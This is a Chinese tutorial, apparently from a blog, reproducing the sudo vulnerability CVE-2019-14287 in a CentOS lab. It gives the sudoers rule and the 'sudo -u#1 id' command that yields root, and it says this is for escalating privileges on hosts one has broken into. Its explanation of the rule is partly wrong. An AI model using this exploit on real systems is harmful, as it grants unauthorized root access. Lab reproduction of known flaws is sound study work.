【网络安全】复现CVE-2019-14287漏洞

简介: Sudo的全称是"superuserdo”,它是Linux系统管理指令,允许用户在不需要切换环境的前提下,以其它用户的权限运行应用程序或命令,通常是以root用户身份运行命令,以减少root用户的登录和管理时间,同时提高安全性,当在Linux操作系统上执行命令时,只有得到许可或者知道root密码,普通用户才可以使用sudo命令以root身份执行命令.个人理解:(直白点讲就是,如果你入侵了他人的主机,可以利用该漏洞,进行权限升级,不用切换root,因为切换root的时候需要输入密码,用该漏洞可以跳过该步骤,获得权限)

复现CVE-2019-14287漏洞

原理:Sudo的全称是"superuserdo”,它是Linux系统管理指令,允许用户在不需要切换环境的前提下,以其它用户的权限运行应用程序或命令,通常是以root用户身份运行命令,以减少root用户的登录和管理时间,同时提高安全性,当在Linux操作系统上执行命令时,只有得到许可或者知道root密码,普通用户才可以使用sudo命令以root身份执行命令.

个人理解:(直白点讲就是,如果你入侵了他人的主机,可以利用该漏洞,进行权限升级,不用切换root,因为切换root的时候需要输入密码,用该漏洞可以跳过该步骤,获得权限)


那么开始实操吧!

1.打开contos7 liunx系统

(怎么安装虚拟机,就不讲了太简单了)

图片.png

2.部署可实现该漏洞的环境

图片.png

3.查看版本

命令:sudo -V

图片.png

4.需要配置网络信息

命令: vim /etc/sudoers

图片.png

5.找到root行,在root下一行加入一个命令

命令:test    ALL=(ALL,!root)  ALL

这里的第一个ALL代表用户可以在任何地方使用我们的sudo(简单点讲,假如每个人家里都有智能空调,你可以在任意地点远程操纵你的空调,就是这个道理)

(ALL,!root)该命令的意思就很简单了,表示除了root其他用户不可以使用sudo这个命令

最后一个ALL 表示被允许执行

图片.png

6.利用漏洞

(1)先创建一个test用户,并且创建密码后切换到test用户

命令;新建;passwd test

切换;su test

图片.png

(2)这时候会出现一个问题

图片.png

Test用户无权用root身份登录

那么怎么解决呢?

输入命令;sudo -u#1 id(这个就是体现了这个漏洞,原理上咱们限制了test 不能用root的命令,但是通过这个漏洞 成功的获得了root权限)

图片.png

这样就可以解决该问题了










相关文章
|
4天前
|
SQL 人工智能 安全
网络安全漏洞、加密技术与安全意识的探索
【8月更文挑战第16天】在数字化时代,网络安全成为维护个人隐私和企业数据的关键防线。本文将深入探讨网络安全中的漏洞问题,分析加密技术在保护信息安全中的作用,并强调培养良好的安全意识的重要性。通过案例分析和理论阐述,旨在为读者提供一套全面的网络安全知识体系,帮助其在日益复杂的网络环境中保持警惕,采取有效措施防范潜在的网络威胁。
|
2天前
|
SQL 安全 网络安全
网络防御的盾牌:揭秘网络安全漏洞与加密技术的博弈
【8月更文挑战第18天】在数字时代的棋局中,网络安全漏洞和加密技术如同对弈双方,不断上演着攻防战。本文将深入探讨网络安全的薄弱环节,并揭示如何通过先进的加密技术和提升安全意识来构筑防线。我们将从漏洞的形成、利用到防御策略进行全方位的剖析,并分享如何在日常生活中提高个人信息的安全等级。
15 2
|
1天前
|
存储 安全 算法
网络安全的守护盾:漏洞、加密与意识的三重奏
【8月更文挑战第19天】 在数字化浪潮中,网络安全如同一面坚固的护盾,保护着信息资产不受威胁。本文将深入探讨网络安全中的三大关键要素:漏洞管理、加密技术以及安全意识的重要性。我们将通过实际案例分析,了解如何识别和应对网络漏洞,掌握加密技术的基本原理和应用,同时提升个人和组织的安全防范意识。文章旨在为读者提供一套实用的网络安全知识体系,以增强对网络威胁的防御能力。
|
3天前
|
安全 网络安全 数据安全/隐私保护
数字堡垒的裂缝与修复:网络安全漏洞、加密技术与安全意识
【8月更文挑战第17天】 在数字化时代,网络安全如同一座保护数据资产不受侵犯的数字堡垒。然而,这座堡垒并非无懈可击,网络攻击者不断寻找并利用安全漏洞进行破坏活动。本文将深入浅出地探讨网络安全中常见的漏洞类型、加密技术的工作原理以及提升个人和组织安全意识的重要性,旨在为读者提供一套实用的网络安全知识框架,帮助加固数字堡垒的每一砖一瓦。
|
4天前
|
SQL 安全 算法
数字堡垒:网络安全漏洞与加密技术的博弈
在数字化时代,网络安全与信息安全成为保护个人隐私和企业数据不可或缺的防线。本文将探讨网络安全的薄弱环节,分析加密技术如何作为盾牌抵御网络威胁,并强调提升安全意识的重要性。通过深入浅出的方式,我们旨在为读者揭开网络安全的神秘面纱,提供实用的防护策略,确保每个人都能在信息海洋中安全航行。
14 1
|
4天前
|
存储 监控 安全
网络安全漏洞与防护策略
【8月更文挑战第16天】在数字化时代,网络安全问题日益突出。本文将探讨网络安全漏洞的类型、成因和影响,以及如何通过加密技术和提升安全意识来防范这些漏洞。我们将分析不同类型的网络攻击,如恶意软件、钓鱼攻击和DDoS攻击,并讨论如何利用加密技术保护数据传输和存储的安全。此外,我们还将强调培养良好的网络安全习惯和提高员工安全意识的重要性。最后,我们将提出一些实用的网络安全策略,以帮助企业和个人更好地保护自己免受网络威胁。
13 2
|
4天前
|
安全 网络协议 网络安全
网络安全与信息安全:关于网络安全漏洞、加密技术、安全意识等方面的知识分享
在数字化时代,网络安全和信息安全已成为我们生活中不可或缺的一部分。本文将介绍网络安全漏洞的概念、加密技术的基本原理以及提高个人和企业的安全意识的重要性。通过深入浅出的方式,帮助读者了解如何保护自己免受网络攻击,并提高对网络安全的认识。
13 1
|
4天前
|
监控 安全 算法
数字堡垒之下:网络安全漏洞与加密技术的较量
【8月更文挑战第16天】在数字化时代,网络安全漏洞和加密技术如同两股相互博弈的力量。本文将通过具体案例和数据分析,探讨网络安全漏洞的形成、影响以及防范措施,同时深入讨论加密技术在保护信息安全中的关键作用。文章旨在提升公众的网络安全意识,并分享实用的安全策略,以帮助个人和企业构建更加坚固的数字防御系统。
11 1
|
2天前
|
SQL 安全 网络安全
网络安全的隐形盾牌:漏洞、加密与安全意识
【8月更文挑战第19天】 在数字时代的浪潮中,网络安全已成为我们不可忽视的重要议题。从微小的漏洞到强大的加密技术,再到每个人的安全意识,每一个环节都关系到我们的信息安全。本文将深入浅出地探讨这些看似复杂却又息息相关的主题,带你走进网络安全的世界,理解其重要性,并学习如何保护自己的信息安全。
7 0
|
2天前
|
SQL 安全 算法
数字堡垒下的暗流涌动——网络安全漏洞与信息安全的较量
【8月更文挑战第19天】在数字化浪潮汹涌澎湃的今天,网络安全和信息安全如同一座座坚固的数字堡垒,守护着信息时代的边疆。然而,在这看似坚不可摧的防线下,暗流涌动,网络安全漏洞层出不穷,成为不法分子窃取信息、破坏系统的秘密通道。本文将深入探讨网络安全漏洞的类型与成因,分析加密技术在防御中的关键作用,并强调提升安全意识的重要性,以期为读者呈现一场没有硝烟的网络攻防战。